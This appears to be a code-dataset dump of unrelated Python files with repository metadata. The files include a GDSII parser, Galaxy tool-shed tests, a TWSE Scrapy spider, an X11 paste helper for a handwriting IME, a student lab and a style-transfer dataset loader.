>>> r = Record(tags.LIBSECUR, [1, 2, 3, 4, 5, 6])
>>> r.acls
[(1, 2, 3), (4, 5, 6)]
>>> r = Record(tags.LIBSECUR, [1, 2, 3, 4]) # wrong data size
>>> r.acls
Traceback (most recent call last):
...
DataSizeError: 15106
"""
if len(self.data) % 3:
raise exceptions.DataSizeError(self.tag)
return list(zip(self.data[::3], self.data[1::3], self.data[2::3]))
@classmethod
def iterate(cls, stream):
"""
Generator function for iterating over all records in a GDSII file.
Yields :class:`Record` objects.
:param stream: GDS file opened for reading in binary mode
"""
last = False
while not last:
rec = cls.read(stream)
if rec.tag == tags.ENDLIB:
last = True
yield rec
class Reader(object):
"""Class for buffered reading of Records"""
__slots__ = ("current", "stream")
def __init__(self, stream):
self.stream = stream
def read_next(self):
"""Read and return next record from stream."""
self.current = Record.read(self.stream)
return self.current
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.IGNORE_EXCEPTION_DETAIL)
| 28.845258 | 89 | 0.55728 | 2,134 | 17,336 | 4.379569 | 0.194939 | 0.014231 | 0.005136 | 0.036914 | 0.242992 | 0.215172 | 0.141986 | 0.096405 | 0.074577 | 0.040552 | 0 | 0.051362 | 0.318297 | 17,336 | 600 | 90 | 28.893333 | 0.739381 | 0.464871 | 0 | 0.15625 | 0 | 0 | 0.028346 | 0 | 0 | 0 | 0.01322 | 0.003333 | 0 | 1 | 0.125 | false | 0 | 0.022321 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8566907344117140f18d19e73cdf9613f31abbd | 4,778 | py | Python | texts/objects/helper.py | nicolay-r/frame-based-attitude-extraction-workflow | f20e6d17a9eb6613028545b889c74626a8260ccd | [
"MIT"
] | null | null | null | texts/objects/helper.py | nicolay-r/frame-based-attitude-extraction-workflow | f20e6d17a9eb6613028545b889c74626a8260ccd | [
"MIT"
] | 6 | 2020-10-03T13:45:38.000Z | 2021-07-13T18:31:57.000Z | texts/objects/helper.py | nicolay-r/frame-based-attitude-extraction-workflow | f20e6d17a9eb6613028545b889c74626a8260ccd | [
"MIT"
] | null | null | null | from collections import Iterable
from core.processing.ner.obj_decs import NerObjectDescriptor
from texts.objects.authorized.collection import AuthorizedObjectsCollection
from texts.objects.authorized.object import AuthTextObject
class TextObjectHelper:
def __init__(self):
pass
@staticmethod
def __optionally_fix(term, template, remove):
if template not in term:
return term
if not remove:
# Perform cut operation
from_ind = term.index(template)
if from_ind > 0:
return term[:from_ind]
else:
# Removing the related template.
return term.replace(template, "")
return term
@staticmethod
def fix_terms_inplace(input_terms):
"""
Fix remove extra garbage, that was not captured by text reader.
"""
for i, term in enumerate(input_terms):
# Optionally remove "e.
upd_term = TextObjectHelper.__optionally_fix(term=term, template='"', remove=True)
# Optionally cut everything till &#CODE.
upd_term = TextObjectHelper.__optionally_fix(term=upd_term, template='&#', remove=False)
# Extra tags.
upd_term = TextObjectHelper.__optionally_fix(term=upd_term, template='<', remove=False)
input_terms[i] = upd_term
@staticmethod
def try_fix_object_value(obj_desc, input_terms, is_term_func, check_obj_includes_non_term=True):
assert(isinstance(obj_desc, NerObjectDescriptor))
assert(isinstance(input_terms, list))
assert(callable(is_term_func))
r_len = obj_desc.Length
i, j = obj_desc.get_range()
j -= 1
# Crop from non-terms at left and right object bounds.
changed = False
while not is_term_func(i) or not is_term_func(j):
if not is_term_func(i):
i += 1
r_len -= 1
changed = True
if not is_term_func(j):
j -= 1
r_len -= 1
changed = True
if i >= len(input_terms):
break
if j == 0:
break
if i > j:
break
if i > j:
return None
if check_obj_includes_non_term:
for index in range(i, j+1):
if not is_term_func(index):
return None
if not changed:
return obj_desc
return NerObjectDescriptor(pos=i,
length=r_len,
obj_type=obj_desc.ObjectType)
@staticmethod
def iter_missed_objects(lemmas_list, existed_objects, auth_objects, get_collection_ind_func):
assert(isinstance(lemmas_list, list))
assert(isinstance(existed_objects, Iterable))
assert(isinstance(auth_objects, AuthorizedObjectsCollection))
assert(callable(get_collection_ind_func))
used = [False] * len(lemmas_list)
for obj in existed_objects:
bound = obj.get_bound()
i = bound.TermIndex
while i < bound.TermIndex + bound.Length:
used[i] = True
i += 1
position = 0
while position < len(used):
if used[position]:
position += 1
continue
max_term_length = 1
while max_term_length < auth_objects.MaxTermLength:
index = position + max_term_length
if index >= len(used):
break
if used[index]:
break
max_term_length += 1
next_position = position + 1
for r_offset in reversed(list(range(max_term_length))):
last_term_index = position + r_offset
if not (last_term_index < len(used)):
position = next_position
break
terms = lemmas_list[position:last_term_index+1]
lemma_value = ' '.join(terms)
if not auth_objects.has_value(lemma_value):
if r_offset == 0:
position = next_position
break
else:
continue
yield AuthTextObject(terms=terms,
position=position,
is_auth=True,
obj_type="UNKN",
description="restored",
collection_ind=get_collection_ind_func())
position = last_term_index + 1
break
| 31.025974 | 100 | 0.53244 | 496 | 4,778 | 4.879032 | 0.247984 | 0.014463 | 0.028926 | 0.02686 | 0.154132 | 0.086777 | 0.070248 | 0.054545 | 0.054545 | 0.054545 | 0 | 0.005925 | 0.39954 | 4,778 | 153 | 101 | 31.228758 | 0.837574 | 0.051486 | 0 | 0.296296 | 0 | 0 | 0.004665 | 0 | 0 | 0 | 0 | 0 | 0.064815 | 1 | 0.046296 | false | 0.009259 | 0.037037 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85705db77f222ff628abe4c8a385fc228d7d2bd | 9,539 | py | Python | data/train/python/a85705db77f222ff628abe4c8a385fc228d7d2bdtest_0110_invalid_simple_repository_dependencies.py | harshp8l/deep-learning-lang-detection | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | [
"MIT"
] | 84 | 2017-10-25T15:49:21.000Z | 2021-11-28T21:25:54.000Z | data/train/python/a85705db77f222ff628abe4c8a385fc228d7d2bdtest_0110_invalid_simple_repository_dependencies.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 5 | 2018-03-29T11:50:46.000Z | 2021-04-26T13:33:18.000Z | data/train/python/a85705db77f222ff628abe4c8a385fc228d7d2bdtest_0110_invalid_simple_repository_dependencies.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 24 | 2017-11-22T08:31:00.000Z | 2022-03-27T01:22:31.000Z | from tool_shed.base.twilltestcase import common, ShedTwillTestCase
datatypes_repository_name = 'emboss_datatypes_0110'
datatypes_repository_description = "Galaxy applicable data formats used by Emboss tools."
datatypes_repository_long_description = "Galaxy applicable data formats used by Emboss tools. This repository contains no tools."
emboss_repository_name = 'emboss_0110'
emboss_repository_description = 'Galaxy wrappers for Emboss version 5.0.0 tools'
emboss_repository_long_description = 'Galaxy wrappers for Emboss version 5.0.0 tools'
category_name = 'Test 0110 Invalid Repository Dependencies'
category_desc = 'Test 0110 Invalid Repository Dependencies'
class TestBasicRepositoryDependencies( ShedTwillTestCase ):
'''Testing emboss 5 with repository dependencies.'''
def test_0000_initiate_users( self ):
"""Create necessary user accounts and login as an admin user."""
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
test_user_1 = self.test_db_util.get_user( common.test_user_1_email )
assert test_user_1 is not None, 'Problem retrieving user with email %s from the database' % common.test_user_1_email
self.test_db_util.get_private_role( test_user_1 )
self.logout()
self.login( email=common.admin_email, username=common.admin_username )
admin_user = self.test_db_util.get_user( common.admin_email )
assert admin_user is not None, 'Problem retrieving user with email %s from the database' % common.admin_email
self.test_db_util.get_private_role( admin_user )
def test_0005_create_category( self ):
"""Create a category for this test suite"""
self.create_category( name=category_name, description=category_desc )
def test_0010_create_emboss_datatypes_repository_and_upload_tarball( self ):
'''Create and populate the emboss_datatypes repository.'''
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
category = self.test_db_util.get_category_by_name( category_name )
repository = self.get_or_create_repository( name=datatypes_repository_name,
description=datatypes_repository_description,
long_description=datatypes_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
self.upload_file( repository,
filename='emboss/datatypes/datatypes_conf.xml',
filepath=None,
valid_tools_only=True,
uncompress_file=True,
remove_repo_files_not_in_tar=False,
commit_message='Uploaded datatypes_conf.xml.',
strings_displayed=[],
strings_not_displayed=[] )
def test_0015_verify_datatypes_in_datatypes_repository( self ):
'''Verify that the emboss_datatypes repository contains datatype entries.'''
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
self.display_manage_repository_page( repository, strings_displayed=[ 'Datatypes', 'equicktandem', 'hennig86', 'vectorstrip' ] )
def test_0020_create_emboss_5_repository_and_upload_files( self ):
'''Create and populate the emboss_5_0110 repository.'''
category = self.test_db_util.get_category_by_name( category_name )
repository = self.get_or_create_repository( name=emboss_repository_name,
description=emboss_repository_description,
long_description=emboss_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
self.upload_file( repository,
filename='emboss/emboss.tar',
filepath=None,
valid_tools_only=True,
uncompress_file=True,
remove_repo_files_not_in_tar=False,
commit_message='Uploaded emboss tool tarball.',
strings_displayed=[],
strings_not_displayed=[] )
def test_0025_generate_repository_dependency_with_invalid_url( self ):
'''Generate a repository dependency for emboss 5 with an invalid URL.'''
dependency_path = self.generate_temp_path( 'test_0110', additional_paths=[ 'simple' ] )
datatypes_repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = 'http://http://this is not an url!'
name = datatypes_repository.name
owner = datatypes_repository.user.username
changeset_revision = self.get_repository_tip( datatypes_repository )
strings_displayed = [ 'Repository dependencies are currently supported only within the same tool shed' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0030_generate_repository_dependency_with_invalid_name( self ):
'''Generate a repository dependency for emboss 5 with an invalid name.'''
dependency_path = self.generate_temp_path( 'test_0110', additional_paths=[ 'simple' ] )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = '!?invalid?!'
owner = repository.user.username
changeset_revision = self.get_repository_tip( repository )
strings_displayed = [ 'because the name is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0035_generate_repository_dependency_with_invalid_owner( self ):
'''Generate a repository dependency for emboss 5 with an invalid owner.'''
dependency_path = self.generate_temp_path( 'test_0110', additional_paths=[ 'simple' ] )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = repository.name
owner = '!?invalid?!'
changeset_revision = self.get_repository_tip( repository )
strings_displayed = [ 'because the owner is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0040_generate_repository_dependency_with_invalid_changeset_revision( self ):
'''Generate a repository dependency for emboss 5 with an invalid changeset revision.'''
dependency_path = self.generate_temp_path( 'test_0110', additional_paths=[ 'simple', 'invalid' ] )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = repository.name
owner = repository.user.username
changeset_revision = '!?invalid?!'
strings_displayed = [ 'because the changeset revision is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
| 64.891156 | 135 | 0.645875 | 1,012 | 9,539 | 5.695652 | 0.13834 | 0.027759 | 0.031228 | 0.04424 | 0.72762 | 0.683727 | 0.660479 | 0.636537 | 0.625087 | 0.59195 | 0 | 0.015777 | 0.289024 | 9,539 | 146 | 136 | 65.335616 | 0.83412 | 0.063214 | 0 | 0.581967 | 0 | 0 | 0.102983 | 0.006303 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.07377 | false | 0 | 0.008197 | 0 | 0.090164 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85887d35309a8a0a9e6464edc0775b4eb8e590c | 3,752 | py | Python | exchanges/twse/spiders/stock/branch.py | shwang-bk/fin4crawl | 3c86add7c30817b1d739e510c321f631a43b9c71 | [
"MIT"
] | 1 | 2020-03-26T14:46:55.000Z | 2020-03-26T14:46:55.000Z | exchanges/twse/spiders/stock/branch.py | shwang-bk/fin4crawl | 3c86add7c30817b1d739e510c321f631a43b9c71 | [
"MIT"
] | null | null | null | exchanges/twse/spiders/stock/branch.py | shwang-bk/fin4crawl | 3c86add7c30817b1d739e510c321f631a43b9c71 | [
"MIT"
] | 1 | 2021-04-10T00:53:14.000Z | 2021-04-10T00:53:14.000Z | import datetime
import scrapy
from scrapy.loader import ItemLoader
from itemloaders.processors import MapCompose, TakeFirst
from exchanges.twse.items import BranchSettlementItem
from exchanges.twse.handlers import StockBranchHandler as Handler
class BranchSettlementSpider(scrapy.Spider):
name = 'twse_branch_settlement'
allowed_domains = ['bsr.twse.com.tw']
date = datetime.date.today().strftime("%Y%m%d")
def __init__(self, *args, **kwargs):
super(BranchSettlementSpider, self).__init__(*args, **kwargs)
self.processed = self.total = []
def start_requests(self):
self.logger.info(f'Parsing date: {self.date}')
self.total = Handler.load_symbols()
if self.total:
for symbol in self.total:
req = Handler.new_request(symbol, self.parse, self.on_error)
yield scrapy.Request(**req)
else:
req = Handler.stocks_request(self.date, self.parse_stocks, None)
yield scrapy.Request(**req)
def parse_stocks(self, response):
self.total = Handler.get_symbols(response)
for symbol in self.total:
req = Handler.new_request(symbol, self.parse, self.on_error)
yield scrapy.Request(**req)
def parse(self, response):
if Handler.check_download_link(response):
yield scrapy.Request(url=Handler.content_url, meta=response.meta, encoding='cp950',
callback=self.parse_csv, errback=self.on_error, dont_filter=True)
else:
response.meta['form'] = Handler.new_form(response)
yield scrapy.Request(url=Handler.get_img_url(response), meta=response.meta,
callback=self.parse_img, errback=self.on_error, dont_filter=True)
def parse_img(self, response):
form = response.meta['form']
form = Handler.update_form(response, form)
yield scrapy.FormRequest(url=Handler.menu_url, meta=response.meta, formdata=form,
callback=self.parse, errback=self.on_error, dont_filter=True)
def parse_csv(self, response):
rows = response.body_as_unicode().split('\n')
rows = [row for row in rows if row.count(',') == 10 and ('券商' not in row)]
for row in rows:
row = row.split(',')
yield self.parse_raw(response.meta['symbol'], row[1:5])
yield self.parse_raw(response.meta['symbol'], row[7:])
self.processed.append(response.meta['symbol'])
self.logger.info(f"({len(self.processed)}/{len(self.total)}) {response.meta['symbol']} [{len(rows)} rows]")
def parse_raw(self, symbol, raw):
terms = BranchSettlementItem.Meta.fields
loader = ItemLoader(item=BranchSettlementItem())
loader.default_input_processor = MapCompose(str, str.strip)
loader.default_output_processor = TakeFirst()
loader.add_value('date', self.date)
loader.add_value('code', symbol)
for idx, field in enumerate(terms):
loader.add_value(field, raw[idx])
return loader.load_item()
def on_error(self, failure):
symbol = failure.request.meta['symbol']
req = Handler.new_request(symbol, self.parse, self.on_error)
yield scrapy.Request(**req)
@classmethod
def from_crawler(cls, crawler, *args, **kwargs):
spider = super().from_crawler(crawler, *args, **kwargs)
crawler.signals.connect(spider.spider_closed, signal=scrapy.signals.spider_closed)
return spider
def spider_closed(self, spider):
least = set(self.total) - set(self.processed)
self.logger.info(f"Write {len(least)} symbol cache")
Handler.write_symbols(least)
| 42.636364 | 115 | 0.646322 | 457 | 3,752 | 5.172867 | 0.28884 | 0.050761 | 0.027919 | 0.035533 | 0.240271 | 0.22758 | 0.181472 | 0.167936 | 0.135787 | 0.101946 | 0 | 0.002781 | 0.233209 | 3,752 | 87 | 116 | 43.126437 | 0.818909 | 0 | 0 | 0.150685 | 0 | 0.013699 | 0.0629 | 0.023454 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136986 | false | 0 | 0.082192 | 0 | 0.30137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8597d6a58d9a1c42b4658050b83da78b2549954 | 2,057 | py | Python | gnome-helper.py | Saren-Arterius/google-chinese-handwriting-ime | f24d0fc1d9b7ab08aab8afa545247d560eefe293 | [
"CC0-1.0"
] | 75 | 2018-01-21T22:57:34.000Z | 2021-11-12T05:53:57.000Z | gnome-helper.py | Saren-Arterius/google-chinese-handwriting-ime | f24d0fc1d9b7ab08aab8afa545247d560eefe293 | [
"CC0-1.0"
] | 8 | 2018-01-23T11:42:25.000Z | 2022-03-25T18:47:59.000Z | gnome-helper.py | Saren-Arterius/google-chinese-handwriting-ime | f24d0fc1d9b7ab08aab8afa545247d560eefe293 | [
"CC0-1.0"
] | 9 | 2018-01-22T07:36:33.000Z | 2021-05-07T12:59:37.000Z | #!/usr/bin/env python3
from time import sleep
from sys import argv
import pyperclip
import ctypes
X11 = ctypes.CDLL("libX11.so")
CLIPBOARD_WAIT_DELAY = 0.2
class Display(ctypes.Structure):
""" opaque struct """
class XKeyEvent(ctypes.Structure):
_fields_ = [
('type', ctypes.c_int),
('serial', ctypes.c_ulong),
('send_event', ctypes.c_int),
('display', ctypes.POINTER(Display)),
('window', ctypes.c_ulong),
('root', ctypes.c_ulong),
('subwindow', ctypes.c_ulong),
('time', ctypes.c_ulong),
('x', ctypes.c_int),
('y', ctypes.c_int),
('x_root', ctypes.c_int),
('y_root', ctypes.c_int),
('state', ctypes.c_uint),
('keycode', ctypes.c_uint),
('same_screen', ctypes.c_int),
]
class XEvent(ctypes.Union):
_fields_ = [
('type', ctypes.c_int),
('xkey', XKeyEvent),
('pad', ctypes.c_long * 24),
]
X11.XOpenDisplay.restype = ctypes.POINTER(Display)
def linux_send_key(code, mask):
display = X11.XOpenDisplay(None)
winFocus = ctypes.c_ulong()
retval = ctypes.c_ulong()
X11.XGetInputFocus(display, ctypes.byref(
winFocus), ctypes.byref(retval))
k = XEvent(type=2).xkey
k.state = mask
k.keycode = X11.XKeysymToKeycode(display, code) # ctrl
k.root = X11.XDefaultRootWindow(display)
k.window = winFocus
X11.XSendEvent(display, k.window, True, 1, ctypes.byref(k))
X11.XCloseDisplay(display)
def linux_backspace():
linux_send_key(0xff08, 0)
def linux_paste():
linux_send_key(0x0076, 4) # Ctrl
def type_char(char):
was = None
try:
was = pyperclip.paste()
except:
pass
pyperclip.copy(char)
# call(["xdotool", "key", "CTRL+V"], False)
linux_paste()
if was is not None:
sleep(CLIPBOARD_WAIT_DELAY)
pyperclip.copy(was)
if __name__ == '__main__':
while True:
data = input()
if data == 'bs!!':
linux_backspace()
else:
type_char(data) | 25.7125 | 63 | 0.600875 | 254 | 2,057 | 4.669291 | 0.38189 | 0.106239 | 0.067454 | 0.028668 | 0.033727 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0.251337 | 2,057 | 80 | 64 | 25.7125 | 0.747403 | 0.042781 | 0 | 0.059701 | 0 | 0 | 0.060714 | 0 | 0 | 0 | 0.006122 | 0 | 0 | 1 | 0.059701 | false | 0.014925 | 0.059701 | 0 | 0.19403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a859d985eea327c0dbbd79bbb9765350b4d53fbb | 1,594 | py | Python | lab4/lab4_loops_and_pi.py | macarl08/esc180_coursework | 16f2adda1f35875b91020e72cb4180d2e45690ce | [
"MIT"
] | null | null | null | lab4/lab4_loops_and_pi.py | macarl08/esc180_coursework | 16f2adda1f35875b91020e72cb4180d2e45690ce | [
"MIT"
] | null | null | null | lab4/lab4_loops_and_pi.py | macarl08/esc180_coursework | 16f2adda1f35875b91020e72cb4180d2e45690ce | [
"MIT"
] | null | null | null | # ESC180 Lab 4
# loops_and_pi.py
# Oct 5, 2021
# Done in collaboration by:
# Ma, Carl Ka To (macarl1) and
# Xu, Shen Xiao Zhu (xushenxi)
import math
# Problem 1
def count_evens(L):
s = 0
for num in L:
if num % 2 == 0:
s += 1
return s
# Problem 2
def list_to_str(lis):
s = "["
for num in lis:
s += str(num) + ", "
s = s.rstrip(", ")
s += "]"
return s
def lists_are_the_same(list1, list2):
if len(list1) == len(list2):
for i in range(len(list1)):
if list1[i] == list2[i]:
continue
else:
return False
else:
return False
return True
steps1 = [0]
def simpify_fraction(n, m):
big = max(n,m)
for i in range(big, 0, -1):
n1 = n / i
m1 = m / i
steps1[0] += 1
if n1 == int(n1) and m1==int(m1):
return str(int(n1)) + "/" + str(int(m1))
return str(n) + "/" + str(m)
def count_terms(n):
sum = 0
i = 0
while True:
sum += (-1)**i/(2*i+1)
i+=1
pi = 4* sum
if int(pi*(10**(n-1))) == int(math.pi*(10**(n-1))):
print(pi)
return i
steps2 = [0]
def euclid(n, m):
if n==0:
return m
steps2[0] += 1
return euclid(m % n, n)
a = [1,2,3,4,5]
b = [1,2,3,4,5]
c = [2,3,4,5,1]
print("Problem 1")
print(count_evens(a))
print()
print("Problem 2")
print(list_to_str(a))
print()
print("Problem 3")
print(lists_are_the_same(a,b))
print(lists_are_the_same(a,c))
print()
print("Problem 4")
print(simpify_fraction(1, 2))
print(simpify_fraction(16, 12))
print()
print("Problem 5")
print(count_terms(5))
print()
print("Problem 6")
steps1 = [0]
steps2 = [0]
print(simpify_fraction(2322,654))
print(euclid(2322,654))
print(steps1[0], steps2[0]) | 15.326923 | 53 | 0.59724 | 299 | 1,594 | 3.107023 | 0.274247 | 0.077503 | 0.091496 | 0.048439 | 0.055974 | 0.04521 | 0 | 0 | 0 | 0 | 0 | 0.084585 | 0.206399 | 1,594 | 104 | 54 | 15.326923 | 0.649802 | 0.090339 | 0 | 0.197368 | 0 | 0 | 0.042996 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.013158 | 0 | 0.223684 | 0.289474 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85a9316f8024e1e5d4bd7e60047a91413b93401 | 2,875 | py | Python | lib/dataset.py | Limbicnation/ada-conv-pytorch | 434e77d8987dd8bb9d4ba9612178688e2117e2cf | [
"MIT"
] | 43 | 2021-11-01T03:59:58.000Z | 2022-03-28T19:03:00.000Z | lib/dataset.py | Limbicnation/ada-conv-pytorch | 434e77d8987dd8bb9d4ba9612178688e2117e2cf | [
"MIT"
] | 3 | 2021-11-04T03:24:34.000Z | 2022-02-04T09:25:59.000Z | lib/dataset.py | Limbicnation/ada-conv-pytorch | 434e77d8987dd8bb9d4ba9612178688e2117e2cf | [
"MIT"
] | 5 | 2021-12-14T08:31:08.000Z | 2022-03-13T03:01:12.000Z | import random
import warnings
from pathlib import Path
from PIL import Image
from torch.utils.data import IterableDataset, Dataset
from torchvision.transforms import ToTensor, Compose, Resize, CenterCrop
from torchvision.utils import save_image
def files_in(dir):
return list(sorted(Path(dir).glob('*')))
def save(img_tensor, file):
if img_tensor.ndim == 4:
assert len(img_tensor) == 1
save_image(img_tensor, str(file))
def load(file):
img = Image.open(str(file))
img = img.convert('RGB')
return img
def style_transforms(size=256):
# Style images must be 256x256 for AdaConv
return Compose([
Resize(size=size), # Resize to keep aspect ratio
CenterCrop(size=(size, size)), # Center crop to square
ToTensor()])
def content_transforms(min_size=None):
# min_size is optional as content images have no size restrictions
transforms = []
if min_size:
transforms.append(Resize(size=min_size))
transforms.append(ToTensor())
return Compose(transforms)
class StylizationDataset(Dataset):
def __init__(self, content_files, style_files, content_transform=None, style_transform=None):
self.content_files = content_files
self.style_files = style_files
id = lambda x: x
self.content_transform = id if content_transform is None else content_transform
self.style_transform = id if style_transform is None else style_transform
def __getitem__(self, idx):
content_file, style_file = self.files_at_index(idx)
content_img = load(content_file)
style_img = load(style_file)
content_img = self.content_transform(content_img)
style_img = self.style_transform(style_img)
return {
'content': content_img,
'style': style_img,
}
def __len__(self):
return len(self.content_files) * len(self.style_files)
def files_at_index(self, idx):
content_idx = idx % len(self.content_files)
style_idx = idx // len(self.content_files)
assert 0 <= content_idx < len(self.content_files)
assert 0 <= style_idx < len(self.style_files)
return self.content_files[content_idx], self.style_files[style_idx]
class EndlessDataset(IterableDataset):
"""
Wrapper for StylizationDataset which loops infinitely.
Usefull when training based on iterations instead of epochs
"""
def __init__(self, *args, **kwargs):
self.dataset = StylizationDataset(*args, **kwargs)
def __iter__(self):
while True:
idx = random.randrange(len(self.dataset))
try:
yield self.dataset[idx]
except Exception as e:
files = self.dataset.files_at_index(idx)
warnings.warn(f'\n{str(e)}\n\tFiles: [{str(files[0])}, {str(files[1])}]')
| 29.336735 | 97 | 0.66887 | 368 | 2,875 | 5.005435 | 0.30163 | 0.053746 | 0.060803 | 0.04126 | 0.046688 | 0.046688 | 0.031488 | 0 | 0 | 0 | 0 | 0.006824 | 0.235478 | 2,875 | 97 | 98 | 29.639175 | 0.83121 | 0.094261 | 0 | 0 | 0 | 0.015625 | 0.027509 | 0 | 0 | 0 | 0 | 0 | 0.046875 | 1 | 0.171875 | false | 0 | 0.109375 | 0.046875 | 0.421875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85aabbf97ddbf8fe98bb57622389b4ce5f6c670 | 285 | py | Python | pypxl/__init__.py | Kile/pypxl | 0aabe5492386bffc1e246100cb55448bbac521ec | [
"MIT"
] | 1 | 2021-04-02T09:05:33.000Z | 2021-04-02T09:05:33.000Z | pypxl/__init__.py | Kile/pypxl | 0aabe5492386bffc1e246100cb55448bbac521ec | [
"MIT"
] | null | null | null | pypxl/__init__.py | Kile/pypxl | 0aabe5492386bffc1e246100cb55448bbac521ec | [
"MIT"
] | null | null | null | """
pypxl - an asyncronous wrapper for pxlapi (pxlapi.dev)
:copyright: (c) 2021 Kile
:license: MIT, see LICENSE for more details
"""
__title__ = "pypxl"
__author__ = "Kile"
__license__ = "MIT"
__copyright__ = "Copyright 2021 Kile"
__version__ = "0.2.3"
from .client import PxlClient | 20.357143 | 54 | 0.722807 | 37 | 285 | 5.027027 | 0.702703 | 0.086022 | 0.150538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045643 | 0.154386 | 285 | 14 | 55 | 20.357143 | 0.726141 | 0.438596 | 0 | 0 | 0 | 0 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85bb1f21a2eedc8117779c68d0a353233875e12 | 17,848 | py | Python | multiple_auto_decay.py | aliayub7/EEC | ffb65e6701f5316b69c1ef3c3c130f00b73a18da | [
"MIT"
] | 6 | 2021-05-25T03:21:07.000Z | 2021-11-18T13:38:10.000Z | multiple_auto_decay.py | aliayub7/EEC | ffb65e6701f5316b69c1ef3c3c130f00b73a18da | [
"MIT"
] | null | null | null | multiple_auto_decay.py | aliayub7/EEC | ffb65e6701f5316b69c1ef3c3c130f00b73a18da | [
"MIT"
] | 1 | 2021-05-25T12:07:49.000Z | 2021-05-25T12:07:49.000Z | import numpy as np
import sys
import os
import time
import pickle
from PIL import Image
